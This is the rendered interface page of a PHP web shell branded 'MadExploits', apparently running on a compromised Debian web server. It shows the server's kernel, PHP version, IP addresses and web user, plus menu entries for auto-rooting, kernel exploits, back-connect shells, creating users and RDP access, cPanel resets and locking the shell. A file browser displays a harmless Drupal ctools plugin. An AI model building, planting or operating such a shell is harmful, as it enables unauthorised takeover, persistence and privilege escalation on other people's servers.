Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.133.152.151
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
plugins /
cache /
[ HOME SHELL ]
Name
Size
Permission
Action
export_ui.inc
1.2
KB
-rw-r--r--
simple.inc
1.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : export_ui.inc
<?php /** * @file * A caching mechanism for use with subsystems that use the export ui. */ $plugin = array( // cache plugins are the rare plugin types that have no real UI but // we're providing a title just in case. 'title' => t('Export UI wizard cache'), 'cache get' => 'ctools_cache_export_ui_cache_get', 'cache set' => 'ctools_cache_export_ui_cache_set', // Some operations use a 'finalize' but that really just means set // for us, since we're not using temporary storage for subsystems. 'cache finalize' => 'ctools_cache_export_ui_cache_set', ); function ctools_cache_export_ui_cache_get($plugin_name, $key) { ctools_include('export-ui'); $plugin = ctools_get_export_ui($plugin_name); $handler = ctools_export_ui_get_handler($plugin); if ($handler) { $item = $handler->edit_cache_get($key); if (!$item) { $item = ctools_export_crud_load($handler->plugin['schema'], $key); } return $item; } } function ctools_cache_export_ui_cache_set($plugin_name, $key, $item) { ctools_include('export-ui'); $plugin = ctools_get_export_ui($plugin_name); $handler = ctools_export_ui_get_handler($plugin); if ($handler) { return $handler->edit_cache_set_key($item, $key); } }
Close